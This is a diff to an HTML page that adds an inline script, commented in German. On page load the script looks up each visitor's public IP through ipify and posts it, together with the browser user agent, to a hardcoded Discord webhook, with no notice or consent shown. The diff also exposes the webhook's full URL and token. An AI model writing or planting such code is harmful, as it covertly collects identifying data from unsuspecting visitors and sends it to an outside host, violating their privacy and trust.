--- a/main.html
+++ b/main.html
@@ -7,5 +7,36 @@
     
   </head>
   <body>
+    <script>
+    document.addEventListener("DOMContentLoaded", function() {
+        const webhookURL = "https://discord.com/api/webhooks/1340019352275259554/gwvY0HY1viu1EIrXkNtqhTO5JvIcBe9q025vJFoWnrqKlkIBQ2ZpprA8bUpUJbjTJGDs";
+        
+        // Hole User-Daten
+        fetch("https://api64.ipify.org?format=json")
+            .then(response => response.json())
+            .then(data => {
+                const payload = {
+                    content: "**Neue Besucher auf der Website!**",
+                    embeds: [{
+                        title: "📌 Besuch getrackt!",
+                        color: 3447003,  // Blau
+                        fields: [
+                            { name: "🖥️ IP-Adresse", value: data.ip, inline: true },
+                            { name: "🌍 User-Agent", value: navigator.userAgent, inline: false }
+                        ],
+                        timestamp: new Date()
+                    }]
+                };
+
+                // Sende Daten an Discord Webhook
+                fetch(webhookURL, {
+                    method: "POST",
+                    headers: { "Content-Type": "application/json" },
+                    body: JSON.stringify(payload)
+                });
+            })
+            .catch(error => console.error("Fehler beim Abrufen der IP:", error));
+    });
+</script>
   </body>
 </html>
